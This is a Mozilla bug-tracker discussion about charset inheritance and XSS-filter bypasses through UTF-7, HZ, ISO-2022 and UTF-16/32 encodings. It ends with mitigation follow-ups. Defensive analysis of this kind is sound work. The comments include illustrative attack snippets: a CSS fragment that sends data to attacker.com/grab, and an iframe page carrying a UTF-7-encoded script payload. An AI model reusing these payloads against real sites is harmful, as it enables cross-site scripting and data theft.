Closed Bug 603740 Opened 14 years ago Closed 11 years ago

Do not honor charset override from containing document unless same-origin (<link>, <script>, possibly others)

Categories

(Core :: DOM: Core & HTML, defect, P2)


Tracking


RESOLVED WORKSFORME
Tracking Status
firefox-esr17 --- wontfix
b2g18 --- wontfix

People

(Reporter: zwol, Assigned: hsivonen)

References

Details

(Keywords: sec-audit, Whiteboard: [sg:audit])

Bug 579744 describes a "universal XSS" attack which uses the @type attribute of <object> to force a nested cross-origin HTML page to be read as if it had been encoded in UTF-7. This permits the attacker to bypass XSS filters on the nested site, which are looking for "<script>" but not "+ADw-script+AD4-". Analogous attacks may be possible using other types of content, loaded via other tags. For instance, <link rel="stylesheet" type="text/css; charset=UTF-7"> might be usable to bypass server-side filters aiming to block the attack described in bug 524223.

To be safe, we should audit all code that reads MIME types and/or charsets for included content from the enclosing document, and make sure that this information is only honored when the included content is same-origin with the enclosing document.

Servers that are properly configured to send a Content-Type header, with a charset attribute, for all textual content cannot be attacked in this way; but a large minority of servers omit the charset attribute (as discussed in bug 579744) and a smaller but still nontrivial minority don't send Content-Type at all.

This is defense-in-depth, since we're not supporting UTF-7 anymore, and all the *known* attacks have received more targeted fixes, but we shouldn't neglect the possibility that some other supported character set could be used in the same way. (Shift JIS, ISO-2022-JP, and UTF-{16,32} come to mind.)

This may not need to be restricted access, being defense-in-depth against largely hypothetical attacks; I'll let someone else make that call.
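(Editorial aside, not part of the original report: a minimal Python sketch of the filter bypass described above, using Python's utf_7 codec purely for illustration.)

  # The "+ADw-script+AD4-" bytes contain no '<' or '>' at all, so a naive
  # byte-level filter sees nothing suspicious, yet a UTF-7 decoder turns
  # them back into "<script>".
  payload = b"+ADw-script+AD4-alert(1)+ADw-/script+AD4-"
  assert b"<script" not in payload          # the filter passes it
  print(payload.decode("utf_7"))            # -> <script>alert(1)</script>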
> To be safe, we should audit all code that reads MIME types and/or charsets
> for included content from the enclosing document, and make sure that this
> information is only honored when the included content is same-origin with
> the enclosing document.

And add automated tests :)
Whiteboard: [sg:audit][sg:high?]
> to bypass server-side filters aiming to block the attack described in bug
> 524223.

This is the part I'm not getting. What would the server-side filter be filtering for, and how would affecting the charset of a stylesheet make that not work?

> Servers that are properly configured to send a Content-Type header, with a
> charset attribute, for all textual content

Are a tiny minority, in my experience. Most servers don't send their stylesheets with any sort of charset. Same for scripts. A _lot_ more servers send charsets for HTML than for those.

Also, unlike <object> and the like it's very common to have the script and stylesheet references be cross-domain (but within the same site; often coming off some sort of CDN server or dedicated subresource server). So there's nontrivial potential of site breakage here. Combined with the fact that the relevant specs currently call for the behavior we have right now, I'd really like to understand the issues we're trying to address before making changes here.
(In reply to comment #2)
> > to bypass server-side filters aiming to block the attack described in bug
> > 524223.
>
> This is the part I'm not getting. What would the server-side filter be
> filtering for, and how would affecting the charset of a stylesheet make that
> not work?

For instance, a server-side filter against bug 524223 might see this (in user-submitted content, which will be embedded into a file that *ought* to be treated as HTML, but per 524223, might get treated as CSS instead):

  body{background:url("http://attacker.com/grab?

and replace the '{' with '&#123;', which blocks the attack. But if the attacker instead sends

  body+AHs-background:url(+ACI-http://attacker.com/grab?

that might skate through the filters, and then the attacking page can use <link rel="stylesheet" type="text/css;charset=utf-7"> to decode the punctuation. This was determined (by the folks who did all the research behind 524223) to work in old IE at least.

> > Servers that are properly configured to send a Content-Type header, with a
> > charset attribute, for all textual content
>
> Are a tiny minority, in my experience. Most servers don't send their
> stylesheets with any sort of charset. Same for scripts. A _lot_ more
> servers send charsets for HTML than for those.

Right, and charset on HTML is itself not common, which is why there's a risk here.

> Also, unlike <object> and the like it's very common to have the script and
> stylesheet references be cross-domain (but within the same site; often coming
> off some sort of CDN server or dedicated subresource server). So there's
> nontrivial potential of site breakage here. Combined with the fact that the
> relevant specs currently call for the behavior we have right now, I'd really
> like to understand the issues we're trying to address before making changes
> here.

I see this as defense-in-depth against attacks we may not yet know about, which are analogous to the attacks in bug 579744 and bug 524223. I'm not sure how to quantify the cost/benefit here.
> a server-side filter against bug 524223

Ah, I see. So this posits that the content being stolen will not be lossy when treated as UTF-7 also, right? I suppose that's plausible...

> I'm not sure how to quantify the cost/benefit here.

A good start might be getting some data on how often stylesheets are linked to from documents cross-domain and rely on the "inherit charset from the document" or "set charset via @charset" behaviors. For what it's worth, I expect the latter to be less common than the former... That would at least quantify the cost. Quantifying the benefit is harder, but having at least the cost quantified would be good.
It seems to me that the remedy that this bug report calls for is too drastic, since it hasn't been shown that inheriting the charset when the charset is a rough ASCII superset opens up an attack vector.

The UTF-7 attack vector is addressed by removing UTF-7 from Gecko as a Web-exposed encoding and by adding it as a special case for mailnews code only. UTF-32 attacks could easily be addressed by removing UTF-32 support altogether as HTML5 says. Opera already removed UTF-32 support.

For charsets that are not rough ASCII supersets, I think we should make those never inherit into anything. There's a public bug about this for the inheritance into a frame case: bug 599320.

It would be great if the charset alias service indicated whether a charset is a rough ASCII superset.
Seems plausible, but can we come up with a coherent definition of "rough ASCII superset"?
(In reply to comment #6)
> Seems plausible, but can we come up with a coherent definition of "rough ASCII
> superset"?

I was thinking of http://www.whatwg.org/specs/web-apps/current-work/#ascii-compatible-character-encoding

There's text under http://www.whatwg.org/specs/web-apps/current-work/#charset that deals with the flip side of the browser *not* supporting an encoding.
Boris, could you own this and make sure it moves forward, or gets reassigned to someone else if you won't be able to work on it?
Assignee: nobody → bzbarsky
I can take a look, but not till after 2.0. Is that ok?
Priority: -- → P2
Whiteboard: [sg:audit][sg:high?] → [sg:audit]
Keywords: sec-audit
Assignee: bzbarsky → hsivonen
Status: NEW → RESOLVED
Closed: 12 years ago
Resolution: --- → FIXED
Anne, did we decide this isn't actually dangerous? But comment 0 argues that this might bypass some security filters.
I was never sure to what extent this was a real threat. I think it's probably 90+% addressed by disallowing UTF-7 and the non-ASCII-superset CJK encodings in Web content. However, I just filed https://www.w3.org/Bugs/Public/show_bug.cgi?id=20886 on the HTML5 definition of "ASCII compatible character encoding" being too weak to rule out all attacks of this type.
Status: RESOLVED → REOPENED
Resolution: FIXED → ---
Status: REOPENED → ASSIGNED
So I marked this FIXED accidentally. I didn't fix this.

At TPAC, we decided not to change this on the assumption that the page needs to trust what it's including. We didn't consider the case where a proxy is second-guessing the referring page's trust in the referenced resource. However, if the malicious resource comes over https, the proxy doesn't get to inspect it anyway without a MITM cert. And if we want the world to move to https and we don't want proxies to TLS MITM their users, we aren't really supporting the case of proxies scanning resources. And besides, if the proxy didn't inspect the UTF-16 interpretation of unlabeled stuff just in case, it could be fooled with charset="UTF-16" on the <link>/<script> element.

Since we don't want to facilitate proxy scanning in the https case, since we want every case to become an https case, and since the problem scenario assumes a proxy whose security scan is trivially bypassed with charset="UTF-16" on the referring element, I suggest WONTFIX. dveditz, do you agree?
Flags: needinfo?(dveditz)
(In reply to Henri Sivonen (:hsivonen) from comment #12)
> So I marked this FIXED accidentally. I didn't fix this. At TPAC, we decided
> not to change this on the assumption that the page needs to trust what it's
> including.

This envisions the attack scenario backward: the *outer* page is the *attacker*. In the original UTF-7 scenario, the attack page would look something like this:

  <!doctype html>
  <head><meta charset="utf-7"><title>Gotcha</title></head>
  <body>
  <iframe src="http://victim.example/search?q=%2BADw-script%2BAD4-alert%28%22gotcha%22%29%2BADw-/script%2BAD4-"></iframe>
  </body></html>

(That is, ?q=<script>alert("gotcha")</script> with the angle brackets encoded in UTF-7 and then all the punctuation reencoded using %-escapes so it doesn't get mangled before it's supposed to. Not actually tested.)

The victim didn't trust anything, it just failed to specify its own charset, so the attacker caused it to be Wrong, and thus bypassed the naive server-side XSS filter on victim.example that was looking for the literal string '<script'. There are several other similar attacks but they all rest upon the *attacker* transcluding the *victim* and overriding the victim's expected charset, not vice versa.
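(Editorial aside, not from the original comment: a short Python sketch of how the query value in the <iframe> above could be assembled. The victim.example host and the q parameter are hypothetical, exactly as in the comment.)

  import urllib.parse

  # UTF-7 form of '<script>alert("gotcha")</script>', written out by hand.
  utf7_payload = '+ADw-script+AD4-alert("gotcha")+ADw-/script+AD4-'

  # %-escape the punctuation so it survives being placed in a URL; the
  # output reproduces the query string used in the <iframe> example.
  query = urllib.parse.quote(utf7_payload)
  print("http://victim.example/search?q=" + query)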
The iframe case is fixed.

1) The encoding doesn't inherit to child browsing contexts cross-origin.
2) UTF-16 doesn't inherit to child browsing contexts even in the same-origin case.
3) If the page is UTF-16 without the charset menu, charset menu can't change that.
4) You can't select UTF-16 from the charset menu. (I.e. #3 and #4 mean the attack doesn't work if the attacker parent convinces the user to touch the charset menu.)
5) UTF-7 no longer exists; the UTF-16 family is the only ASCII-incompatible thing left.

The case Anne and I discussed at TPAC was the UTF-16 encoding of the HTML page inheriting into referenced unlabeled JS or CSS. We couldn't come up with an actual attack in that case.

Is there an actual attack with JS or CSS inclusion when the only ASCII-incompatible encodings left are the ones that form the UTF-16 family?
> 5) UTF-7 no longer exists; the UTF-16 family is the only ASCII-incompatible thing left.

Not true; there's a bunch of variable-byte CJK encodings that reuse ASCII codepoints. Firefox 18 still supports HZ-GB-2312, at least (see the HTML5 bug referenced above).

> The case Anne and I discussed at TPAC was the UTF-16 encoding of the HTML page
> inheriting into referenced unlabeled JS or CSS. We couldn't come up with an
> actual attack in that case.

The only thing I can think of right now is, if the victim site serves a JSON document containing private information, with a JS syntax error at the beginning to prevent it being loaded cross-domain by <script>, the attacker *might* somehow be able to neutralize the syntax error by manipulating the character set.
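(Editorial aside, a minimal Python sketch of the point about HZ-GB-2312 reusing ASCII bytes, using Python's built-in hz codec; it is not taken from the original discussion.)

  # "~{" and "~}" are plain printable ASCII, but under HZ-GB-2312 they shift
  # into and out of double-byte GB2312 mode, so ASCII bytes between them are
  # swallowed into CJK characters.
  raw = b'A~{!!~}B'
  print(raw.decode('windows-1252'))   # A~{!!~}B  (what an ASCII-minded filter sees)
  print(raw.decode('hz'))             # the "!!" pair became U+3000, leaving just A and B
  # And the bytes round-trip: a legitimate HZ encoder can produce them.
  assert '\u3000'.encode('hz') == b'~{!!~}'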
The variable-byte encodings are still ASCII-compatible. (And error handling for them has been carefully adjusted to prevent these kinds of problems.)
ASCII-compatible in the HTML5 sense? I'm not confident that definition is strong enough (see the spec bug cited above).
(In reply to Zack Weinberg (:zwol) from comment #15)
> > 5) UTF-7 no longer exists; the UTF-16 family is the only ASCII-incompatible thing left.
>
> Not true; there's a bunch of variable-byte CJK encodings that reuse ASCII
> codepoints. Firefox 18 still supports HZ-GB-2312, at least (see the HTML5
> bug referenced above).

Whoa. That's terrible. Your demo even roundtrips if you decode it and re-encode it.

However, for JS and CSS, stopping inheritance wouldn't defend against attacks that build on this characteristic of the victim encoding. Even if we didn't inherit, the attacker could still use charset="..." on the referring element. Even if we prevented that, it would be enough for the attacker to depend on the fallback encoding (UTF-8 for CSS and Windows-1252 for JS). So to defend against this attack for JS and CSS, we'd have to prevent cross-origin references unless the referenced resource declares its character encoding. Doing that would break the Web for sure. So as far as I can tell, we can't fix this for JS and CSS. Fortunately, at least at present, no one has a demonstration of an attack using JS or CSS victims.

For the iframe case, the attack is being defended against if we consider the case where the user just loads something and doesn't touch the character encoding menu. However, the vulnerability you demonstrated in the spec bug is still present if you consider cases where the user can be baited into touching the character encoding menu. That is, if the user switches to another encoding, Gecko honors that. Perhaps we should have more encodings than UTF-16 that don't participate in the character encoding menu. Unfortunately, doing this for non-UTF-16 encodings will be more complex, since non-UTF-16 encodings can be declared using the meta element, so the decision to honor the menu would need to be deferred further.
Flags: needinfo?(dveditz)
(In reply to Henri Sivonen (:hsivonen) from comment #18)
> So to defend against this attack for JS and CSS, we'd have to prevent
> cross-origin references unless the referenced resource declares its
> character encoding.

Or we'd have to flag the resource so that the CSS or JS parser knows to fail hard on ~{
> cases where the user can be baited into touching the character encoding menu

Could we make the charset menu only apply to the top page and same-origin frames?
(In reply to Jesse Ruderman from comment #20)
> > cases where the user can be baited into touching the character encoding menu
>
> Could we make the charset menu only apply to the top page and same-origin
> frames?

We could, but

1) The attacker could bait a user to change the encoding directly on the victim site.
2) We'd have no UI for correcting a bogus encoding in different-origin frames without stuffing cruft in the context menu, and even in the context menu the UI would be confusing due to the reload behavior. (Dunno if people really need to change the encoding because of different-origin frames.)
It is worth noting that the vulnerable encodings are not the default anywhere, so HTML encoded using a vulnerable encoding without an encoding label is vulnerable in the simple case of being visited without chardet. To really defend against this problem, we would need to make all the other decoders (UTF-8, Windows-1252, etc.) start to fail hard and emit REPLACEMENT CHARACTERs after bytes that match an escape sequence in the vulnerable encodings if the encoding has been chosen by a mechanism other than labeling (BOM counting as labeling).
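(Editorial aside, a hypothetical Python sketch of the kind of check described above: scanning content whose encoding was not declared for byte sequences that are shift/escape sequences in the vulnerable encodings. The function name and the exact set of sequences are illustrative assumptions, not Gecko code.)

  # Hypothetical sketch: flag unlabeled content whose bytes look like a shift
  # or escape sequence from one of the "dangerous" encodings discussed here.
  SUSPECT_SEQUENCES = (
      b'~{',        # HZ-GB-2312 shift-in
      b'\x1b$',     # ISO-2022-{JP,KR,CN} multibyte designation escapes
      b'\x1b(',     # ISO-2022 escape back to a single-byte set
      b'+ADw-',     # UTF-7 encoding of '<' (UTF-7 itself is already gone)
  )

  def looks_charset_suspicious(data: bytes) -> bool:
      """Return True if undeclared content contains bytes that another
      decoder could reinterpret via an escape/shift sequence."""
      return any(seq in data for seq in SUSPECT_SEQUENCES)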
(In reply to Henri Sivonen (:hsivonen) from comment #22)
> To really defend against this problem, we would need to make all the other
> decoders (UTF-8, Windows-1252, etc.) start to fail hard and emit REPLACEMENT
> CHARACTERs after bytes that match an escape sequence in the vulnerable
> encodings if the encoding has been chosen by a mechanism other than labeling
> (BOM counting as labeling).

Which, of course, would open up a new attack: making pages unusable (bunch of REPLACEMENT CHARACTERs) by introducing a HZ or ISO 2022 escape in user-supplied content.

So there are two cases here:

* Victim pages that use the HZ encoding or an ISO 2022 family encoding and declare it.
* Victim pages that use the HZ encoding or an ISO 2022 family encoding and don't declare it.

The case where the victim declares the encoding could be addressed by making the charset menu have no effect on such pages.

The case where the victim doesn't declare the encoding is fundamentally unsafe. Since HZ or the ISO 2022 encodings aren't the default in any locale, those pages are either always first loaded in a vulnerable state or they depend on chardet not to be vulnerable in some configurations. To make this case not vulnerable, we'd need to make all the *other* decoders work in a bogus way, which would open up a new attack opportunity as noted above. I think the best we can do for these cases is to whine to console and hope that an admin gets notified and migrates the content to a non-vulnerable encoding (preferably UTF-8).

Should I just proceed to making the changes to make the charset menu have no effect on labeled HZ and ISO 2022 pages and adding console whines? Or should we first collect telemetry to figure out if this is a Real Problem that merits the complication of making the charset menu processing even more complex than it already is? Or should we be bold enough to make the charset menu only work for unlabeled pages? This would introduce less complexity than making the charset menu have an effect on some (presumably mis-)labeled pages but not others. Should we first collect telemetry on how often users change the encoding on labeled pages? Or something else?
Whining is a definitive win so I think we should go ahead with that. I'd prefer to have data before making more drastic changes, although it's hard to imagine HZ and 2022 to be frequently used.
(In reply to Anne van Kesteren from comment #24)
> although it's hard
> to imagine HZ and 2022 to be frequently used.

Right. And the key is use on sites with user-supplied content. Static legacy sites should be safe enough.
Filed bug 840476 about telemetry on charset menu use on labeled vs. unlabeled pages.
(In reply to Anne van Kesteren from comment #24)
> Whining is a definitive win so I think we should go ahead with that. I'd
> prefer to have data before making more drastic changes, although it's hard
> to imagine HZ and 2022 to be frequently used.

Except ISO-2022-JP. Fortunately, IE stopped supporting unlabeled ISO-2022-JP pages, so the impact would be lower than it used to be.
Some Japanese pages encoded in Shift_JIS mislabel themselves as ISO-2022-JP because IE's ISO-2022-JP decoder happily decodes Shift_JIS text.
(In reply to Masatoshi Kimura [:emk] from comment #28)
> Some Japanese pages encoded in Shift_JIS mislabel themselves as ISO-2022-JP
> because IE's ISO-2022-JP decoder happily decodes Shift_JIS text.

Why don't we do that? What would be the downsides of doing that (and putting it in the Encoding Standard)?
I'm fine with updating our implementation if the Encoding Standard is updated.
(In reply to Masatoshi Kimura [:emk] from comment #30)
> I'm fine with updating our implementation if the Encoding Standard is
> updated.

Let's do that.

I have round-trippable PoCs for HZ and ISO-2022-JP at: http://hsivonen.iki.fi/p/charset-xss/ (Round-trippable in the sense that a HZ or ISO-2022-JP encoder could produce those bytes.)

I didn't come up with round-trippable PoCs for ISO-2022-KR and ISO-2022-CN yet.

Do we believe that neither the Web nor email needs ISO-2022-KR or ISO-2022-CN? What about HZ?
Sigh. Looks like Chrome added ISO-2022-KR and -CN back instead of making pages so declared not load: https://code.google.com/p/chromium/issues/detail?id=15701 We should probably remove the HZ, -KR and -CN decoders and make pages that declare those not load (i.e. not fall back to something else). Then we need to make pages that declare -JP unoverridable.
See also http://zaynar.co.uk/docs/charset-encoding-xss.html for previously disclosed attacks.
Not sure we'd fix this on an ESR branch but marking affected so we come back later and check.
I suggest the following path forward:

1) Introduce the replacement encoding from https://www.w3.org/Bugs/Public/show_bug.cgi?id=21057 to Gecko.
2) Remove the ISO-2022-KR, ISO-2022-CN and HZ-GB-2312 decoders and encoders.
3) Map all their aliases to the replacement encoding.
4) Make the detectors never decide that content is encoded in ISO-2022-KR, ISO-2022-CN or HZ-GB-2312. (Simplified Chinese and Korean already ship with detector off, so sites relying on autodetection are already vulnerable.)
5) Make the ISO-2022-JP decoder support Shift_JIS byte sequences, too, in a way compatible with IE.
6) See how the change from point #5 affects charset menu telemetry (bug 840476 and bug 843586) and either:
   a) Make the menu have no effect when the page has an encoding label.
   b) Make the menu have no effect if the page declares ISO-2022-JP.
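(Editorial aside, a minimal Python sketch of what the replacement encoding mentioned in point 1 does, under the assumption that it matches the spec proposal linked above: any non-empty byte stream decodes to a single U+FFFD, so a label mapped to it can never be used to smuggle markup.)

  def replacement_decode(data: bytes) -> str:
      # Sketch of the "replacement" encoding's decoder: the whole byte
      # stream decodes to one REPLACEMENT CHARACTER (or to the empty
      # string for empty input), never to attacker-controlled text.
      return "\ufffd" if data else ""

  assert replacement_decode(b"~{ or ESC $ ) C payloads") == "\ufffd"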
(In reply to Henri Sivonen (:hsivonen) from comment #36)
> I suggest the following path forward:
>
> 1) Introduce the replacement encoding from
> 2) Remove the ISO-2022-KR, ISO-2022-CN and HZ-GB-2312 decoders and encoders.

We already banned the ISO-2022-CN decoder.

> 3) Map all their aliases to the replacement encoding.

I don't think the replacement decoder is needed for ISO-2022-CN because IE has never supported the label "ISO-2022-CN".
It still seems better to not expose sites to a potential hole if their server inadvertently does support iso-2022-cn and they're silly enough to let that be controlled via the URL.
I'm saying we can just remove the ISO-2022-CN decoder without bothering with the replacement decoder.
(In reply to Masatoshi Kimura [:emk] from comment #39)
> I'm saying we can just remove the ISO-2022-CN decoder without bothering with
> the replacement decoder.

Bugzilla archeology suggests people may have email archives that depend on that encoding, so we'll probably need to make Thunderbird support it for email the way we did for UTF-7.

When you say “banned”, do you mean banned only from the browser or from mailnews, too?
Depends on: 863728
Anne, can you remind me why the spec doesn't map HZ and UTF-7 to the replacement encoding?
Per https://www.w3.org/Bugs/Public/show_bug.cgi?id=21057 you thought utf-7 might be relying on fallback. hz-gb-2312 is not obsolete yet and I haven't had requests to remove that encoding.
What kind of usage data is there about HZ? HZ is much easier to write exploits for than iso-2022. I was hoping making HZ no longer a danger would be a higher priority than 2022.
I don't know. We can investigate removing that encoding separately.
So, we know of these dangerous encodings:

* UTF-7
* UTF-16
* UTF-32
* HZ-GB-2312
* ISO-2022-CN
* ISO-2022-KR
* ISO-2022-JP

Each needs to be considered in two ways:

* Is it dangerous to interpret text that the site thinks is in a non-dangerous encoding as a dangerous encoding?
* Is it dangerous to interpret text that the site thinks is in a dangerous encoding as a non-dangerous encoding?

Avenues of attack include:

* The character encoding menu (both directions)
* Inheritance to child frames (both directions)
* Server-side script allows a URL parameter to define the output encoding (dangerous interpreted as non-dangerous if treated as unknown)

Additionally, this bug report guesses that inheritance into CSS or JS could be an attack.

Let's look at each of the encodings:

# UTF-7

Firefox cannot be tricked into interpreting non-UTF-7 as UTF-7, which would be dangerous, because Firefox doesn't support UTF-7. Firefox can trivially, even without involving the menu, be made to treat UTF-7 as non-UTF-7. Whether this is dangerous needs to be analyzed.

# UTF-16

Interpreting UTF-16 as non-UTF-16 would be dangerous. Assuming that \0 doesn't pass through filters, the reverse isn't a problem. UTF-16 attacks are now mitigated by:

* Making UTF-16 unoverridable from the menu.
* Making UTF-16 not available in the menu.
* Making UTF-16 not inherit to child frames even same-origin.

# UTF-32

Firefox cannot be tricked into interpreting non-UTF-32 as UTF-32, because Firefox doesn't support UTF-32. Firefox can trivially, even without involving the menu, be made to treat UTF-32 as non-UTF-32. I *think* this is not dangerous, because every four bytes of UTF-32 always contains one zero byte.

# HZ-GB-2312

Treating non-HZ-GB-2312 as HZ-GB-2312 is exceptionally dangerous. It will be mitigated by removing HZ-GB-2312 from the menu when bug 805374 lands.

Treating HZ-GB-2312 as non-HZ-GB-2312 is potentially dangerous as well. As of today, it is mitigated by making HZ-GB-2312 unoverridable from the menu (bug 941562) and making HZ-GB-2312 not inherit into child frames even same-origin. In six months, we should have telemetry data from bug 935453 to evaluate whether to map HZ to the replacement encoding.

# ISO-2022-KR and ISO-2022-CN

As of today, ISO-2022-[KR|CN] cannot be treated as non-ISO-2022-[KR|CN], because they map to the replacement encoding (bug 863728). The possibility of treating non-ISO-2022-[KR|CN] as ISO-2022-[KR|CN] goes away when bug 805374 lands.

# ISO-2022-JP

This encoding still needs more work. We should consider supporting Shift_JIS sequences in ISO-2022-JP labeled pages (per comment 28) to reduce the probability of the user having a case to override ISO-2022-JP into non-ISO-2022-JP and then make ISO-2022-JP unoverridable. Since IE11 gets away with not having a menu item for ISO-2022-JP, we should consider removing the menu item, too.

- -

As for the original concern that this bug was reported for, inheritance into CSS and JS, in the absence of a proof-of-concept attack, I'm reluctant to make any changes to how inheritance into CSS or JS works. Bug 871161 removed inheritance via window.open() and <form> POST.

I'm inclined to:

* File a bug for investigating whether interpreting UTF-7 as non-UTF-7 can be dangerous as part of an attack based on a server-side script accepting an arbitrary output encoding, including UTF-7, as an untrusted parameter (to decide if we should map it to the replacement encoding).
* File a bug to remove ISO-2022-JP from the menu.
* File a bug to make the ISO-2022-JP decoder support Shift_JIS sequences.
* File a bug to make ISO-2022-JP unoverridable once the decoder supports Shift_JIS sequences.
* Mark this bug as WFM.

Zack, would that be a satisfactory response to this bug report?
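(Editorial aside, a small Python check, not part of the comment, of the UTF-32 observation above that every four-byte code unit contains a zero byte, which is why dropping UTF-32 to an ASCII-compatible encoding is unlikely to slip past a \0-rejecting filter.)

  # Every UTF-32 code unit encodes a value <= 0x10FFFF, so its most
  # significant byte is always 0x00.
  sample = 'attack text with CJK \u4e2d\u6587 and an astral char \U0001f600'
  data = sample.encode('utf-32-le')
  assert all(0 in data[i:i + 4] for i in range(0, len(data), 4))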
If we remove ISO-2022-JP from the menu, you could still select it via the auto-detect option.

We could map utf-32 to the replacement encoding I suppose. There's no value in that encoding either way.

I'm not aware of the details of utf-7. Is it still usable when decoded per utf-8?
(In reply to Henri Sivonen (:hsivonen) from comment #45)
> I'm inclined to:
>
> * File a bug for investigating whether interpreting UTF-7 as non-UTF-7 can
> be dangerous as part of an attack based on a server-side script accepting an
> arbitrary output encoding, including UTF-7, as an untrusted parameter (to
> decide if we should map it to the replacement encoding).
> * File a bug to remove ISO-2022-JP from the menu.
> * File a bug to make the ISO-2022-JP decoder support Shift_JIS sequences.
> * File a bug to make ISO-2022-JP unoverridable once the decoder supports
> Shift_JIS sequences.
> * Mark this bug as WFM.
>
> Zack, would that be a satisfactory response to this bug report?

Given that nobody has yet managed to come up with a JS or CSS exploit, yeah, I could live with that. Has anyone seriously tried to think of one, though?
Being able to force the encoding of CSS/JS does not make it easier to read data from it cross-origin. In case of errors in execution all that is nullified. CSS cannot be read either way. The only other case I can imagine is that some origin with sensitive data also allows uploading arbitrary text files and embedding those as CSS/JS (maybe through XSS), and scans the text files for CSS/JS but does not consider alternate encodings.
(In reply to Anne (:annevk) from comment #46) > If we remove ISO-2022-JP from the menu, you could still select it via the > auto-detect option Yeah. ISO-2022-JP detection not being consistent across configurations and across different browsers is not ideal. > We could map utf-32 to the replacement encoding I suppose. We could, just in case, yeah, but it seems to me that interpreting UTF-32 as UTF-8 or windows-1252 is safe anyway. Now that I think about it more, the danger case is when little-endian UTF-32 is BOM-sniffed as UTF-16LE. In this case, the BOM takes precedence over labels, so mapping labels to "replacement" won't help. This case is basically http://hsivonen.com/test/moz/never-show-user-supplied-content-as-utf-16.htm but with UTF-32LE dropped to UTF-16LE instead of UTF-16 dropped to an 8-bit encoding. I'm rather unamused about the existence of UTF-32. As if making up new UTFs was harmless. :-( > I'm not aware of the details of utf-7. Is it > still usable when decoded per utf-8? You can read ASCII letters, digits and some punctuation if UTF-7 is interpreted as UTF-8 or windows-1252, so there's some value in not just mapping it to replacement. This should even be safe, because the byte sequences that don't represent the same characters as they would in US-ASCII are sequences of +, - and letters. That is, a server-side script can't be fooled into emitting a '<' byte by asking it to output UTF-7. (In reply to Zack Weinberg (:zwol) from comment #47) > Has anyone seriously tried to think of one, though? Maybe not truly seriously, but I have tried to think of one. The case where the CSS/JS file is actually meant to be in a dangerous encoding, is not labeled and relies on inheriting the dangers encoding from HTML from the same site but the encoding changes when the CSS/JS file is included on another site whose HTML uses a non-dangerous encoding is something that we can't do anything about unless start sniffing all unlabeled CSS/JS for byte patterns of the dangerous encodings, which I assume we don't want to do. But if a site was crazy enough to serve JS as unlabeled HZ *and* is crazy enough to, under that circumstance, accept user-supplied strings to be included in the JS, sure, that would be dangerous to interpret as non-HZ. Should we try to protect hypothetical sites that are that crazy? So let's consider where the unlabeled CSS/JS is in a non-dangerous encoding and is included in an HTML file that's in a dangerous encoding. If the malicious host is in UTF-16, the CSS/JS file doesn't decode to the Basic Platinum range at all and won't have any CSS effect and won't compile as JS. This case, therefore, seems harmless. For HZ and ISO-2022-JP, the attack that I can think of would be that there are two user-supplied string literals in the CSS or JS file and the attacker shifts to non-ASCII in the first and and back to ASCII in the second one turning the two string literals into one and turning all CSS/JS in between the literals into mojibake inside the combined literal. It seems improbable that suitable circumstances would arise to offer two slots for user-supplied strings in external .css or .js. It seems even more improbable that deleting code between the literals would result in an exploitable condition.
(In reply to Henri Sivonen (:hsivonen) from comment #49)
> Now that I think about it more, the danger case is when little-endian
> UTF-32 is BOM-sniffed as UTF-16LE. In this case, the BOM takes precedence
> over labels, so mapping labels to "replacement" won't help.
>
> This case is basically
> http://hsivonen.com/test/moz/never-show-user-supplied-content-as-utf-16.htm
> but with UTF-32LE dropped to UTF-16LE instead of UTF-16 dropped to an 8-bit
> encoding.
>
> I'm rather unamused about the existence of UTF-32. As if making up new UTFs
> was harmless. :-(

I just tried writing a proof of concept attack along these lines. Fortunately, this attack doesn't actually work, because any attack would require the little-endian UTF-32 encoder to produce the following byte pattern: printable ASCII byte, 0x00, printable ASCII byte, 0x00. The bits needed for the second ASCII letter byte in a 4-byte sequence always push the little-endian 32-bit interpretation of those 4 bytes to represent a number that's greater than 0x10FFFF, because printable ASCII is > 0x10. Hooray! No security patch to write for this one.

(In reply to Henri Sivonen (:hsivonen) from comment #49)
> But if a site was crazy enough to serve JS as
> unlabeled HZ *and* is crazy enough to, under that circumstance, accept
> user-supplied strings to be included in the JS, sure, that would be
> dangerous to interpret as non-HZ. Should we try to protect hypothetical
> sites that are that crazy?

I say we shouldn't, because protecting against this case would require us to reject unlabeled CSS and JS files that contain the bytes whose ASCII interpretation is tilde followed by open brace. That combination plausible to be rejected in order to protect HZ sites from the dangers of HZ.

Protecting ISO-2022-JP sites from the dangers of ISO-2022-JP would be more plausible, because we'd only need to reject any CSS or JS file that contains the character U+001B, which is non-printable. Still, I'm not convinced that doing so would be worthwhile.
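(Editorial aside, a quick Python check, not from the original comment, of the arithmetic claim above: any 4-byte group of the form printable-ASCII, 0x00, printable-ASCII, 0x00 reads, as a little-endian 32-bit value, as a number above 0x10FFFF, so a UTF-32LE encoder can never emit it.)

  # For bytes a, b in the printable ASCII range (0x20-0x7E), the group
  # a 00 b 00 is the little-endian encoding of a + (b << 16), and b >= 0x20
  # already pushes that value past the 0x10FFFF code point limit.
  assert all(
      int.from_bytes(bytes([a, 0, b, 0]), 'little') > 0x10FFFF
      for a in range(0x20, 0x7F)
      for b in range(0x20, 0x7F)
  )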
The 0x10FFFF limit will eventually have to be raised - I don't care what anyone says to the contrary; we will need more than 1.1 million codepoints in the very long run - but by then hopefully we won't have UTF-16 to kick around anymore.

> That combination plausible to be rejected ...

I assume you meant "that combination is too plausible to be rejected ..."? If so, I concur.
Raising that limit would break JavaScript (and therefore the web). In any event it seems highly unlikely that it will ever be raised. Out of 16 planes 10 are unassigned.
(In reply to Zack Weinberg (:zwol) from comment #51)
> The 0x10FFFF limit will eventually have to be raised - I don't care what
> anyone says to the contrary; we will need more than 1.1 million codepoints
> in the very long run - but by then hopefully we won't have UTF-16 to kick
> around anymore.

There are points unassigned below 0x10FFFF, and despite Emoji, we can still make new meaning by making new strings of existing characters. Also, it will be very hard, likely prohibitively hard, to get rid of UTF-16 as an in-memory representation in many environments, including the Web platform. Anyway, if we ever go past 0x10FFFF and get rid of UTF-16 as an in-memory representation, chances are that we will have gotten rid of UTF-16 as an interchange encoding first, so I'm not too worried about relying on 0x10 being lower than printable ASCII as a defense against UTF-32 attacks.

> > That combination plausible to be rejected ...
>
> I assume you meant "that combination is too plausible to be rejected ..."?
> If so, I concur.

Yes. A word got dropped there.

Follow-ups:

* Bug 943256 - Remove ISO-2022-JP from the menu.
* Bug 945201 - Make ISO-2022-JP unoverridable from the menu.
* Bug 945202 - Shift_JIS sequences in ISO-2022-JP decoder.
* Bug 945215 - Consider mapping HZ to the replacement encoding.

Not really a follow-up but related to the above bugs:

